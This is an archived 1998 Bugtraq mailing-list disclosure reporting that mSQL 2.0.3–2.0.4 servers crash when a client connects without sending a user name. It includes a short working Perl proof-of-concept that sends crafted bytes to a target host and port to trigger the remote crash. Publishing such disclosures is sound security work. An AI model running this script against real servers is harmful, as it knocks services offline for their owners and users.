[8519] in bugtraq


mSQL dummies

daemon@ATHENA.MIT.EDU (Peter Boutzev)
Thu Nov 12 16:03:20 1998

Date: 	Wed, 11 Nov 1998 19:09:27 +0100
Reply-To: boutzev@usa.net
From: Peter Boutzev <boutzev@USA.NET>
To: BUGTRAQ@NETSPACE.ORG

Hello to everyone,

That is: in the function "msqlConnect()", libmsql checks the user name of
the logged-in user. Ok, let's try to connect to an mSQL server without sending it.
I thought that my prog did not work, because it was unable to connect to the mSQL
server. After several retries, I understood that the server had gone away. I
restarted it, and made a new connection. Here is what happens:

---------------
Hit by a sig 11



Forced server shutdown due to bad signal!


IOT trap/Abort

-------------

I discovered this when I was doing an mSQL client with an old
libmsql.dll under Windows. I have no time to look further into the problem,
and I am using mySQL now. Anyway, here is a small cut of code that demonstrates
the problem.

------------------------- CUT HERE --------------------------

#!/usr/bin/perl
use IO::Socket;
# Target host and port are taken from the command line.
$host = $ARGV[0];
$port = $ARGV[1];

&Connect;

sub Connect {
        $sock = IO::Socket::INET->new(
            Proto    => "tcp",
            PeerAddr => $host,
            PeerPort => "msql($port)",
            ) or die "Cannot connect !";
        $sock->autoflush(1);
        print $sock "\x05\x00\x00\x00\x00\x0A\x03\x31\x3A\x0A";
        while (<$sock>) {
                print;
        }
        printf "Y0!-y0-Y0!\n";
}
------------------------------ END ---------------------------

I don't know whether this was discussed here before or not. I informed Hughes
Technologies 5 months ago, and they did not respond to me. Maybe in the new
mSQL 2.0.5 or later the bug was patched; I have no time to test it. 2.0.3
and 2.0.4 seem to be vulnerable. I am not sure about gaining remote access
with this. Anyway, I thought that it should be posted here...
